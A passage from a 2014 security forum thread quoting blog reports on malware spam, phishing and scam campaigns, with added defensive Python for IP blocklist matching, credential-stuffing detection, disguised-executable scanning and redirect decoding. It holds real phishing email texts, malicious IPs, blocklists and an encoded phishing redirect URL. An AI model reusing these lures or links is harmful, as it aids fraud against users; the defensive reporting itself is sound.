* http://www.malware-traffic-analysis.net/2014/08/29/index.html
** http://blog.dynamoo.com/search/label/DINETHOSTING
> https://www.virusbtn.com/virusbulletin/archive/2013/03/vb201303-SweetOrange-ProPack
"... automated iframe obfuscating services for use in web injections. The iframes are -injected- into high-traffic-volume websites and force the users of the websites to visit end points that serve exploits carrying malware..."
___
Fake 'Bonus' SPAM/SCAM ...
- http://myonlinesecurity.co.uk/automated-draw/
2 Sep 2014 - "email received that tells you that you have won £1000 in an automated draw and haven’t claimed it yet:
Attempting to contact <REDACTED>
This is automated draw #23851
Our system shows you have been awarded with £1000!
According to our records, voucher wasn’t collected yet
Please be informed that your voucher is still valid. You may claim your wininngs and use them without making any deposit.
Confirm your email here to claim your £1000 voucher.
Have fun !
Lindsey Lane
CRM Manager..
* This offer is available to new players only.
You have received this email because you have requested more information from BonusNews...
Clicking the button that says claim your reward (or any other of the buttons) gives you a file to run on your computer that installs some casino software that is detected by several anti-malware programs as unwanted*..."
* https://www.virustotal.com/en/file/a615d125ab7423f6c89e5074ed42e568a898f3beab6c3c3c174f417c54529f89/analysis/
___
Hackers behind biggest-ever Password Theft begin Attacks
- http://it.slashdot.org/story/14/09/01/2213202/hackers-behind-biggest-ever-password-theft-begin-attacks
1 Sep 2014 - "Back in August, groups of Russian hackers assembled the biggest list of compromised login credentials ever seen: 1.2 billion accounts. Now, domain registrar Namecheap reports* the hackers have begun using the list to try and access accounts. 'Overnight, our intrusion detection systems alerted us to a much higher than normal load against our login systems. ... The group behind this is using the stored usernames and passwords to simulate a web browser login through -fake- browser software. This software simulates the actual login process a user would use if they are using Firefox/Safari/Chrome to access their Namecheap account. The hackers are going through their username/password list and trying each and every one to try and get into Namecheap user accounts'. They report that most login attempts are failing, but some are succeeding. -Now- is a good time to check that none of your important accounts share passwords."
* http://community.namecheap.com/blog/2014/09/01/urgent-security-warning-may-affect-internet-users/
:mad: :fear:
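The Sweet Orange item above recommends blocking either 95.163.64.0/19 or 95.163.64.0/18. The Python below is an added example, not dynamoo's tooling: it loads a blocklist of single IPs and CIDR prefixes and runs it over proxy log lines, reporting which internal client reached a listed address and which prefix matched. Run against the two prefixes it also shows why the choice matters for this case: 95.163.121.188 falls inside the /18 but outside the /19. The log lines are constructed in Squid's native access.log layout; the client addresses and hostnames are made up.

```python
import ipaddress
import re

# Squid native access.log: time elapsed client code/status bytes method URL rfc931 peerstatus/peerhost type
SQUID_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+(?P<method>\S+)\s+"
    r"(?P<url>\S+)\s+\S+\s+\S+/(?P<dst>\d{1,3}(?:\.\d{1,3}){3})\s"
)


def build_blocklist(entries):
    """Accept single IPs and CIDR prefixes; a bare IP becomes a /32."""
    return [ipaddress.ip_network(e, strict=False) for e in entries]


def matching_prefix(ip, blocklist):
    """Return the first blocklist network containing ip, or None."""
    addr = ipaddress.ip_address(ip)
    for net in blocklist:
        if addr in net:
            return net
    return None


def find_hits(lines, blocklist):
    """Parse proxy log lines and return the requests whose destination IP is on the blocklist.
    Lines that do not parse (cache hits with no peer host, junk) are skipped."""
    hits = []
    for line in lines:
        m = SQUID_RE.match(line)
        if not m:
            continue
        net = matching_prefix(m["dst"], blocklist)
        if net is not None:
            hits.append({"client": m["client"], "url": m["url"],
                         "dst": m["dst"], "matched": str(net)})
    return hits


# Constructed sample log. Only the 95.163.x.x destinations relate to the post above.
SAMPLE_LOG = """\
1409644800.123    234 10.0.0.5 TCP_MISS/200 1532 GET http://hijacked.example/ - HIER_DIRECT/95.163.121.188 text/html
1409644801.456     87 10.0.0.5 TCP_MISS/200 9871 GET http://hijacked.example/js/x.js - HIER_DIRECT/95.163.70.10 application/javascript
1409644802.789     12 10.0.0.7 TCP_HIT/200 1270 GET http://www.example.com/ - NONE/- text/html
1409644803.000     40 10.0.0.7 TCP_MISS/200 5123 GET http://www.example.org/ - HIER_DIRECT/93.184.216.34 text/html
not a squid line
""".splitlines()

if __name__ == "__main__":
    for prefix in ("95.163.64.0/19", "95.163.64.0/18"):
        print(prefix)
        for h in find_hits(SAMPLE_LOG, build_blocklist([prefix])):
            print("  %s -> %s (%s) matched %s" % (h["client"], h["dst"], h["url"], h["matched"]))
```

The same matching_prefix() call is the check to run before committing any "block the /19" rule: feed it the actual hostile address and confirm it returns a network rather than None.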
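Namecheap's description in the password-theft item (a stored username/password list replayed through software that imitates a browser login, most attempts failing, a few succeeding) is the shape of a credential-stuffing run, and the signal it leaves is a single source cycling through many distinct usernames with a high failure rate. The Python below is an added example, not Namecheap's detection code: it runs over constructed authentication log lines, slides a time window per source IP, and alerts when that pattern appears, listing the accounts the source actually got into so they can be locked and reset first. The log format and the thresholds are assumptions for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log format for this example; adapt the regex to the login service's own logs.
AUTH_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})Z src=(?P<src>[\d.]+) "
    r"user=(?P<user>\S+) result=(?P<result>OK|FAIL)$"
)


def parse_auth_log(lines):
    """Return (timestamp, source IP, username, success) tuples; lines that do not parse are skipped."""
    events = []
    for line in lines:
        m = AUTH_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S")
        events.append((ts, m["src"], m["user"], m["result"] == "OK"))
    return events


def detect_credential_stuffing(lines, window=timedelta(minutes=10), min_users=5, min_fail_ratio=0.8):
    """Per source IP, slide a time window over its login attempts and alert when it tries
    many distinct usernames with mostly failures. Returns {src: summary}; 'succeeded' lists
    the accounts the source logged into during a flagged window."""
    by_src = defaultdict(list)
    for ev in parse_auth_log(lines):
        by_src[ev[1]].append(ev)
    alerts = {}
    for src, evs in by_src.items():
        evs.sort()
        start = 0
        succeeded = set()
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1
            win = evs[start:end + 1]
            users = {e[2] for e in win}
            fails = sum(1 for e in win if not e[3])
            if len(users) >= min_users and fails / len(win) >= min_fail_ratio:
                succeeded.update(e[2] for e in win if e[3])
                alerts[src] = {"attempts": len(win), "distinct_users": len(users),
                               "failures": fails, "succeeded": sorted(succeeded)}
    return alerts


# Constructed sample: one legitimate user mistyping a password, one stuffing source
# walking a list of accounts and landing one, one ordinary login, one junk line.
SAMPLE_AUTH_LOG = """\
2014-09-01T23:14:02Z src=203.0.113.5 user=alice result=FAIL
2014-09-01T23:14:09Z src=203.0.113.5 user=alice result=OK
2014-09-01T23:15:00Z src=198.51.100.7 user=alice result=FAIL
2014-09-01T23:15:01Z src=198.51.100.7 user=bob result=FAIL
2014-09-01T23:15:01Z src=198.51.100.7 user=carol result=OK
2014-09-01T23:15:02Z src=198.51.100.7 user=dave result=FAIL
2014-09-01T23:15:03Z src=198.51.100.7 user=erin result=FAIL
2014-09-01T23:15:04Z src=198.51.100.7 user=frank result=FAIL
2014-09-01T23:15:05Z src=198.51.100.7 user=grace result=FAIL
2014-09-01T23:15:06Z src=198.51.100.7 user=heidi result=FAIL
2014-09-01T23:16:30Z src=203.0.113.9 user=bob result=OK
garbage line that the parser must skip
""".splitlines()

if __name__ == "__main__":
    for src, a in detect_credential_stuffing(SAMPLE_AUTH_LOG).items():
        print("%s: %d attempts, %d users, %d failures, got into %s" %
              (src, a["attempts"], a["distinct_users"], a["failures"], a["succeeded"]))
```

Keying on distinct usernames per source, rather than on failures alone, is what separates this from a user who simply forgot a password; a real run also needs to be grouped across sources, since the attacker in the post was plainly not coming from one address.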
AplusWebMaster
2014-09-03, 13:44
FYI...
Fake NDR SPAM - PDF malware
- http://myonlinesecurity.co.uk/ndr-bill-fake-pdf-malware/
3 Sep 2014 - "'NDR Bill' pretending to come from Ebilling <Ebilling@ westlothian .gov.uk> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Non domestic rates bills normally come out in February or March each year, so using this email template in September will or should raise alarm bells immediately. This particular email allegedly being sent by a Scottish Local Council should immediately alert a recipient in the rest of UK to being totally bogus:
Please find attached your Non Domestic Rates bill.
If your account is in credit you are due a refund unless you have any other debt due to the Council.
To allow your credit to be processed please confirm:
- If you want the credit transferred to another account you have with us. Please confirm the account details.
- If you want the credit refunded by cheque, please confirm who it should be sent to and the address.
Links to Non Domestic Rates information are detailed below.
Important Note: If you access these links using a mobile phone the network provider may charge for this service.
Yours sincerely Scott Reid Revenues Manager ...
3 September 2014: 00056468.pdf.zip ( 207 kb): Extracts to 00056468.pdf.exe
Current Virus total detections: 3/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5d7a2618d95f21ab31cdea298dcb9b57739c0432acaad2167d2651538517c808/analysis/1409725854/
- http://blog.dynamoo.com/2014/09/fake-westlothiangovuk-ndr-bill-email.html
3 Sep 2014 - "Sometimes spammers come up with weird approaches. This one is a bill from West Lothian Council in the UK.. well, actually it -isn't- a bill but it comes with a malicious attachment.
From: Ebilling [Ebilling@ westlothian .gov.uk]
Date: 3 September 2014 09:20
Subject: NDR Bill
Please find attached your Non Domestic Rates bill...
Attached is a file 00056468.pdf.zip which contains a malicious executable D0110109.PDF.exe (which has an icon to make it look like a PDF file). This has a low detection rate at VirusTotal of 4/55*... This second component has a VT detection rate of just 3/55**. The Anubis report shows an attempted phone home to 80.94.160.129 (National Academy of Sciences of Belarus) and 92.222.46.165 (OVH, France)
Recommended blocklist:
80.94.160.129
92.222.46.165 ..."
(More at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/b9a54ef4f769068af029aa7941c464990c476911180c9f4ec3379ab3b51ff5b3/analysis/1409733696/
** https://www.virustotal.com/en-gb/file/960ed795dca89e50745251adf6712719a1af1aa5fd1a66c9424c777574180548/analysis/1409734574/
___
“YouTube Account Manager has sent you a Message…”
- https://blog.malwarebytes.org/fraud-scam/2014/09/youtube-account-manager-has-sent-you-a-message/
Sep 3, 2014 - "We’ve seen some complaints of a message sent to YouTube users via the YouTube messaging system, warning of account suspension:
YouTube account manager has sent you a message
We’d like to inform you that due to repeated or severe violations of our community guidelines and your YouTube account will be suspended 3 days from the time of this message. After careful review we determined that activity in your account violated our community guidelines, which prohibit spam, scams or commercially deceptive content. Please be aware that you are prohibited from accessing, possessing or creating any other YouTube accounts.
Please follow the following instructions to recover your account:
1. Please contact your account manager here: [url]
2. You have to complete a quick survey to make sure you are human.
3. Wait for our email explaining the next steps.
* If you decide to ignore this message and not follow the above steps your account will be suspended.
This is what you would see after hitting the supplied link in the message:
“Complete a survey to verify your account”
> http://blog.malwarebytes.org/wp-content/uploads/2014/09/ytaccountmanager1.jpg
This one is a survey scam, and whoever is sending these messages is looking to make a little cash along with the panic they’re no doubt whipping up in YouTube users right about now. The links displayed on the left hand side are regional and will take clickers to various offers / surveys / signups and downloads. If you’re in any doubt as to the status of your YouTube account, you’d be better served contacting them directly than being tricked by these false messages currently in circulation. Scammers will often use similar tactics to send phishing links and malware, so in some ways recipients of this missive are getting the best of a bad deal – it’s “only” surveys and forms to fill in, along with the occasional download. However, that doesn’t mean we should rush to jump through their survey sign-up hoops either. Steer clear of this one, and keep on making those videos."
___
Fake 'Internet free' email SCAM - malware attachment
- http://myonlinesecurity.co.uk/transaction-via-internet-free-charge-idi613410_745-fake-pdf-malware/
3 Sep 2014 - "'Transaction via the Internet free of charge, ID:I613410_745' pretending to come from Santander BillPay is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer... The -scammers-, malware purveyors and phishers do get more creative every day and this email is quite creative, with a link to report suspicious emails to Santander and genuine links to Visa, MasterCard and VeriSign in their efforts to persuade you that it is a genuine email and that you should open the attachment:
Dear <removed>,
Our system detectet that you have made a bill payment using our cloud-based BillPay processing website.
You can find all details regarding the transaction in attachment.
Important information on recent fake email activity
A number of UK banks have recently been targeted by fraudsters using emails to ask customers to enter their security details into a fake website.
At Santander Corporate Banking we will never send you an email that asks you to verify your security details or link to Internet banking. If you receive an email claiming to be from Santander Corporate Banking that you are suspicious about, please forward it to phishing@ santander .co .uk
If you are worried that someone may already have your personal security details, then please contact us on 0151 966 2105. Calls are recorded and may be monitored for security, quality control and training purposes...
3 September 2014 : I613410_745.zip ( 57kb): Extracts to Bill_Payment_2E_832e458.pdf.exe
Current Virus total detections: 1/54* ... This 'Transaction via the Internet free of charge, ID:I613410_745' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/cdbf146c2e551614c0f66b700b36236afdb6edb66c91e29b8da79037e3513d5e/analysis/1409750135/
___
Fake attached CBE form SPAM - PDF malware
- http://myonlinesecurity.co.uk/please-review-attached-cbe-form-pdf-malware/
3 Sep 2014 - "'Please review the attached CBE form' pretending to come from Jonathan.Bledsoe@ adp .com is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email contains a genuine PDF file that is malformed and contains a script virus and can infect you with no action on your part by simply previewing the PDF in your browser or in the PDF reader...
Importat message, read right away.
Please review the attached CBE form, If you require changes to the options shown, please contact me right away so that we may address your concerns. We will record your elections in our system and provide you a final Client Confirmation Statement for your review.
Please sign and send it back.
Regards,
ADP TotalSource Benefits Team
3 September 2014 : cbe_form.pdf - Current Virus total detections: 8/54*
... more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day..."
* https://www.virustotal.com/en/file/415616d596d105b6b7063dda97c25411747c4b7fe9543d8a9214483be7bd2675/analysis/1409761379/
___
Fake 'August report' SPAM - PDF malware
- http://myonlinesecurity.co.uk/august-report-fake-pdf-malware/
3 Sep 2014 - "'August Report' pretending to come from Jackie Cantrell <Jackie.Cantrell@ bankmanager .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Hello , Please find attached documents for last month. Please could you sign the BACs form and return it as your approval that I am to go ahead with the transmission. Kind regards Jackie Payroll Manager
This email attachment has 2 files inside it. Both are identical although have different names, so the bad guys get 2 bites at the cherry.
3 September 2014: BACs_Documents.zip ( 20 kb): Extracts to BACs_Documents.scr
and to Case_090314.scr . Current Virus total detections: 12/55* . This August Report is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/73466f316153b2a347a8e10fe83fd5e84e8c7ab494492cbc9e749fc5777fb1d7/analysis/1409724912/
___
Fake Sky .com SPAM ...
- http://blog.dynamoo.com/2014/09/skycom-statement-of-account-spam-again.html
3 Sep 2014 - "These fake Sky emails are pretty common and have a malicious attachment:
Date: Wed, 3 Sep 2014 09:17:22 +0200 [03:17:22 EDT]
From: "Sky.com" [statement@ sky .com]
Subject: Statement of account
Afternoon,
Please find attached the statement of account.
We look forward to receiving payment for August, invoice as this is now due for payment.
Regards,
Clark ...
The attachment is Statement.zip which contains a malicious executable Statement.scr which has a reasonable VirusTotal detection rate of 18/55*. The Anubis report indicates that the binary phones home..."
* https://www.virustotal.com/en-gb/file/73466f316153b2a347a8e10fe83fd5e84e8c7ab494492cbc9e749fc5777fb1d7/analysis/1409736793/
___
Fake 'Important Documents' email SPAM - PDF malware
- http://myonlinesecurity.co.uk/re-important-documents-fake-pdf-malware/
3 Sep 2014 - "'RE: Important Documents' pretending to come from Simon Leiman <Simon.Leiman@ rbs .com> (the name of the sender at RBS appears to be random and can be any name) is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... No attachment in the email but a link to a compromised website to download the malware:
RE: Important Documents
[RBS Logo Image]
Building tomorrow
RE: Important Information
We’re letting you know we have received a request from your bank to complete and sign the attached documents.
To view/download the documents please click here.
Please fill out the documents and fax them at +44 131 242 0017
Simon Leiman
Senior Accounting Manager
Tel. +44 131 242 0017
Email: Simon.Leiman@ rbs .com
© Royal Bank of Scotland 2014 ...
3 September 2014: AccountDocuments.zip ( 12kb) : Extracts to AccountDocuments.scr
Current Virus total detections: 4/54* . This 'RE: Important Documents' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/35492a48e63c523aec07cae081645dbad07680916f6cfac51f34dcdde41c0822/analysis/
___
iCloud hack/leak now being used as Social Engineering lure
- http://blog.trendmicro.com/trendlabs-security-intelligence/icloud-hacking-leak-now-being-used-as-social-engineering-lure/
Sep 3, 2014 - "... it was certainly only a matter of time before some enterprising cybercriminal decided that things were ripe for leveraging with socially-engineered threats. And that’s just what happened, as our scanning brought to our attention some freshly-concocted schemes targeting those looking for the photos borne from the aforementioned leak. The first threat we found hails from Twitter, in the form of a tweet being posted with hashtags that contain the name of one of the leak’s -victims- Jennifer Lawrence. The tweet spots a shortened link that, if -clicked- leads the user to a website offering a video of the actress in question...
Tweet with malicious link:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/lawrencetweet.png
Website with offered video:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/lawrencewebsite.png
If the user goes on to engage the playback, they are instead redirected to a download page for a ‘video converter’. The downloaded file is detected as ADW_BRANTALL:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/lawrencevideoconverter.png
Besides this bait-and-switch maneuver, this particular threat also spread itself on Facebook by forcing users to share the malicious site on their profiles before they are given the ability to ‘play’ the offered video. This would result in the user’s wall being spammed with the link, as well as the download of another variant of ADW_BRANTALL. The spamming is shown below.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/lawrencefacebookwall.png
Of course, in both cases, the user does not get to watch any video at all. And from our analysis, it appears that the majority of the users affected by this are from the United States (70%). We also discovered several malicious files floating around the internet that have been relabeled as zipped archives and/or video files of the leaked pictures in question. Again, we believe these files are part of a cybercriminal scheme to target those looking for the pictures themselves... With this incident in mind, it’s a good time to remind users that all popular news events – the iCloud leak being a prime example of it – will always have cybercriminals taking advantage of it in one way or another. If it’s something that you’ll use a search engine for, there’s a good chance that they’ve already created threats for it that will jump on you the moment you go looking. And do note that the threats we’ve talked about above are not the only ones lying around in wait! Always get your online news from trusted websites, and refrain from looking for/and downloading illegal material (such as leaked private photos or cracked software). Look into installing a security solution as well, if you haven’t done so already in these turbulent times. A few fleeting moments of convenience or enjoyment is never worth the hassle."
___
'Infrastructure-configuration' adjustment
- http://www.reuters.com/article/2014/09/03/us-facebook-outages-idUSKBN0GY2EQ20140903
Sep 3, 2014 - "Facebook Inc went down briefly for an unknown number of U.S. users on Wednesday afternoon in what appeared to be the latest outage to affect the world's largest social network. Several users had earlier reported getting an error message, "unable to connect to the Internet" when attempting to sign in. Facebook said the log-in problems arose after what it called an infrastructure-configuration adjustment..."
:mad: :fear:
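Several of the campaigns quoted above rely on the same trick: a .zip whose member is something like 00056468.pdf.exe or BACs_Documents.scr, which Windows shows as a "PDF" when known extensions are hidden. The following is an added example (not code from the quoted blogs) that scans a zip listing and flags members whose real extension is executable; the archive it scans is constructed in memory with dummy contents.

```python
"""Flag archive members that are executables disguised as documents.

Added example, not code from the quoted blogs. Names such as
00056468.pdf.exe and BACs_Documents.scr are taken from the posts above; the
archive contents are constructed placeholders.
"""
import io
import zipfile

# Extensions Windows will execute directly when double-clicked.
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd",
                   "js", "jse", "vbs", "vbe", "wsf", "hta", "cpl"}
# Extensions a victim would expect to see on a harmless attachment.
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}


def classify_name(name):
    """Return (verdict, real_ext, displayed_ext) for one member name.

    'executable-disguised': a document extension sits in front of an
                            executable one (invoice.pdf.exe).
    'executable':           the last extension alone is executable
                            (Statement.scr shows as 'Statement').
    'ok':                   anything else.
    """
    base = name.rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    if len(parts) < 2:
        return ("ok", "", "")
    real = parts[-1]
    if real not in EXECUTABLE_EXTS:
        return ("ok", real, real)
    shown = parts[-2] if len(parts) >= 3 else ""
    if shown in DOCUMENT_EXTS:
        return ("executable-disguised", real, shown)
    return ("executable", real, "")


def scan_zip(data):
    """Scan zip bytes and return [(member, verdict)] for suspicious members."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            verdict, _, _ = classify_name(info.filename)
            if verdict != "ok":
                findings.append((info.filename, verdict))
    return findings


def build_sample_zip(names):
    """Construct an in-memory archive with placeholder contents (constructed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for n in names:
            zf.writestr(n, b"placeholder, not a real binary")
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_zip(["00056468.pdf.exe", "BACs_Documents.scr",
                               "Case_090314.scr", "readme.txt"])
    for member, verdict in scan_zip(sample):
        print(f"{member}: {verdict}")
```

A mail gateway rule built on this catches both the double-extension and the bare .scr cases, which is what "show known file extensions" lets a human do by eye.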
AplusWebMaster
2014-09-04, 15:10
FYI...
Fake sage .co.uk "Invoice_7104304" SPAM - PDF malware
- http://blog.dynamoo.com/2014/09/sagecouk-invoice7104304-spam.html
4 Sep 2014 - "This -fake- invoice from Sage is actually a malicious PDF file:
From: Margarita.Crowe@ sage .co.uk [Margarita.Crowe@ sage .co.uk]
Date: 23 July 2014 10:31
Subject: FW: Invoice_7104304
Please see attached copy of the original invoice (Invoice_7104304).
Attached is a file sage_invoice_3074381_09042014.pdf which is -identical- to the payload for this Companies House spam* ..."
* http://blog.dynamoo.com/2014/09/companies-house-ar01-annual-return.html
4 Sep 2014 - "This -fake- Companies House spam comes with a malicious attachment.
Screenshot: https://4.bp.blogspot.com/-ye6yNCTxN5k/VAhC_lNqhQI/AAAAAAAAFjc/azWsv0o1st0/s1600/companies-house-5.png
Attached is a malicious PDF file ar01_456746_09042014.pdf which has a VirusTotal detection rate of 5/54**. The Malware Tracker report shows that this attempts to exploit the CVE-2013-2729 flaw that was patched over a year ago.."
** https://www.virustotal.com/en-gb/file/ecfb08b38bafedfebe2ed9175d10b0490a4afdf62597a628e0f083e406e58a2a/analysis/
- http://myonlinesecurity.co.uk/fw-invoice_5294370-pdf-malware/
4 Sept 2014: sage_invoice_3074381_09042014.pdf - Current Virus total detections: 4/55***
*** https://www.virustotal.com/en/file/ecfb08b38bafedfebe2ed9175d10b0490a4afdf62597a628e0f083e406e58a2a/analysis/1409823534/
___
Fake 'Unauthorised iTunes Purchase' email - PHISH
- http://myonlinesecurity.co.uk/unauthorised-itunes-purchase/
4 Sep 2014 - "email received that says 'Unauthorised iTunes Purchase'. The interesting point about this one is the phishing URL. It is a pass through from a genuine Google URL https ://www.google .com/url?gc=PAH96di-ZUnHVlY&q=%68%74tp%3a%2f%2Fdl6.c1l%2eus%2FSb7ouez&sa=D&usg=AFQjCNEQ84I8qa2xYHVEKwXmJMrXG0_GhA which bounces via another url http ://dl6.c1l .us/Sb7ouez to end up on http ://111.90.144.179 /datacare/login/auth/dc347f94af30dff3ce1efd53f335d0e7/low_aa/
I had no idea that you could use google, especially a HTTPS (secure site) link to pass through to a phishing or any other site. Almost anybody seeing a google link will think that it is safe. Obviously this is a big security risk that Google servers allow this sort of divert or pass through and it needs to be plugged. The site asks for your Apple ID and password, then sends you to a page saying:
My Apple ID
It looks like someone used your data to make unverified purchase.
We need to be sure that you’re real holder of this account and match the information you will provide us now with the information in our databases. Please make sure your information is correct before submitting it to us or it may cause further delays.
Thank you.
Then wants you to fill in the form to give them your Name, address, Date of Birth, Credit card details, Mobile phone number etc. Everything they need to take over your identity in the virtual world as well as clear out all your bank and credit card accounts. It will then bounce you to the correct Apple page..."
111.90.144.179: https://www.virustotal.com/en-gb/ip-address/111.90.144.179/information/
:mad: :fear::fear:
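The iTunes phish above hid its landing page behind a google.com/url?q=... link whose target was percent-encoded (the %68%74tp prefix). As an added example, not code from the quoted post, this decodes such a redirect parameter and reports whether it leaves Google; the sample URLs are constructed with placeholder hosts rather than the ones in the post.

```python
"""Resolve the real destination of a search-engine redirect link.

Added example, not from the quoted post. REDIRECT_HOSTS and the sample URLs
in __main__ are constructed for illustration.
"""
from urllib.parse import urlparse, parse_qs, unquote

REDIRECT_HOSTS = {"www.google.com", "google.com"}


def fully_unquote(value, max_rounds=5):
    """Percent-decode until the value stops changing (bounded), so
    doubly-encoded targets such as %2568 are handled as well."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def redirect_target(url):
    """Return the decoded destination of a google.com/url?q=... link,
    or None when the URL is not such a redirect."""
    p = urlparse(url)
    if p.netloc.lower() not in REDIRECT_HOSTS or p.path != "/url":
        return None
    q = parse_qs(p.query).get("q")   # parse_qs already decodes one layer
    if not q:
        return None
    return fully_unquote(q[0])


def is_offsite_redirect(url):
    """True when the link passes through the redirector to a non-Google host,
    which is the pattern the phish above used to borrow Google's reputation."""
    target = redirect_target(url)
    if target is None:
        return False
    host = urlparse(target).netloc.lower()
    return bool(host) and not (host in REDIRECT_HOSTS or host.endswith(".google.com"))


if __name__ == "__main__":
    # Constructed sample mimicking the encoding seen in the phish, placeholder host.
    sample = ("https://www.google.com/url?gc=abc123"
              "&q=%68%74tp%3a%2f%2Fredirect-target.example%2FSb7ouez&sa=D")
    print(redirect_target(sample))          # http://redirect-target.example/Sb7ouez
    print(is_offsite_redirect(sample))      # True
```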
AplusWebMaster
2014-09-05, 14:42
FYI...
Phishing safety ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/phishing-safety-is-https-enough/
Sep 5, 2014 - "It was recently reported that Google would improve the search ranking of HTTPS sites in their search engine. This may encourage website owners to switch from HTTP to HTTPS. Cybercriminals are -also- taking part in this switch... we recently spotted a case where users searching for the -secure- version of a gaming site were instead led to a phishing site. We researched phishing sites that used HTTPS and were blocked by Trend Micro web reputation technology from 2010-2014. Based on our investigation, the number of phishing sites is increasing and we expect it to -double- towards the latter part of 2014...
Number of HTTPS phishing sites from 2010 to 2014:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/HTTPS_count.jpg
One of the reasons for this spike is that it is easy for cybercriminals to create websites that use HTTPS: they can either compromise sites that already use HTTPS, or use legitimate hosting sites or other services that already use HTTPS. There is no need for the cybercriminals to acquire their own SSL certificate, since they have just abused or compromised servers that -do- have valid certificates...
Screenshots of legitimate site (left) and phishing site (right):
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/legvsphishingsite.jpg
... While some sites have a green icon bar in the address bar as a security indicator, users still need to check the common name and organization. For example, users search for the Bank of America login page and click on the top result. In the login page, they can check for the green icon bar and the domain name, (which in this case is bankofamerica.com). When they click the green icon bar, a window will pop up. Users can then check for the “Issued to” which is equivalent to “Common Name.” Note that the Common Name should be similar to the domain name...
Check the green icon bar and the domain name to determine if it is a legitimate site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/boagreenbaricon.jpg
As more and more sites use SSL due to the boost in Google search rankings, users will have to become aware that the padlock of HTTPS is no longer a sign that they are visiting a safe site. They must first check the certificate before proceeding to enter credentials and personal identifiable information (PII)... Based on feedback from the Smart Protection Network data, the top affected countries that visit HTTPS phishing sites are US and Brazil.
Top affected countries:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/Affected-Countries-01.jpg ..."
___
Hoax email comes with malicious Word doc
- http://blog.dynamoo.com/2014/09/shakira-death-hoax-email-comes-with.html
5 Sep 2014 - "... Spanish-language spam email reports the (fake) death of Shakira in a car accident. Attached is a Word document that contains a malicious macro... translates as:
Shakira dies in serious accident
This morning at 1:10 A.M. in the neighborhood La Macarena, Colombia. The well-known singer and performer Shakira Isabel Mebarak Ripoll, suffered a serious car accident in which she lost her life. Aboard the vehicle was her manager, who was seriously injured. Witnesses say the car driven by the latter, was speeding ..
To view exclusive images and details of the story, we have attached a document with all the information about this tragic event.
When attempting to open the Word document (IMAGENES_01.doc), the potential victim sees the following:
Screenshot: https://4.bp.blogspot.com/-Fl3B4-2DtGs/VAnGpyytNwI/AAAAAAAAFjw/tAwTQGZ3IR8/s1600/shakira.png
The rest of the document explains to the victim how to remove the security settings from Word, supposedly to enable them to view the pictures. But what will actually happen is that the malicious macro in the document will try to infect the PC. This malicious document has a VirusTotal detection rate of just 2/54*. According to an analysis of the document, it then appears to download additional components from an insecure Joomla site at [donotclick]www .papeleriaelcid .com/aurora/ajax/ ... In this case the originating IP was 207.150.195.247 (a SouthWeb Ventures IP allocated to a customer supposedly called "Microinformatica Gerencial, S.A. de C.V."). Blocking the papeleriaelcid .com site and rejecting emails from 207.150.195.247 might be wise ..."
(English or other languages may be spammed out next.)
* https://www.virustotal.com/en-gb/file/564d1beb56c8738d7d1c00f1e863abe0b0cbc1878c26d9c688df0b61da25875b/analysis/1409926479/
___
NatWest Phish: “You are Logging In from Different Cities”
- https://blog.malwarebytes.org/fraud-scam/2014/09/natwest-phish-you-are-logging-in-from-different-cities/
Sep 5, 2014 - "There’s a NatWest phish in circulation which tries to scare recipients with warnings of logins from multiple cities which it claims is forbidden. Anybody spending a lot of time on the road for work or personal reasons could potentially be panicked into clicking the links in this one. The URL in the mail leads to a 404 error on a website about different types of paint, so it’s likely been reported and / or pulled by the hosts but here’s the text so you can easily spot it the next time it gets rolled out with a fresh URL:
Dear Customer,
